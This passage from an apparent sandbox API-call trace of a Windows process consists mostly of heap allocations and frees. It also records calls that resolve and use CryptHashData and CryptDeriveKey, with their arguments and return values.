lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a697f0 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.812] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.812] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.812] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a60 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.814] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.815] CryptHashData (hHash=0x9a40c0, pbData=0x2a71a48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69bb0 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.817] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.817] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.818] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.818] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9e20 [0087.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.819] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a40c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3ec0) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 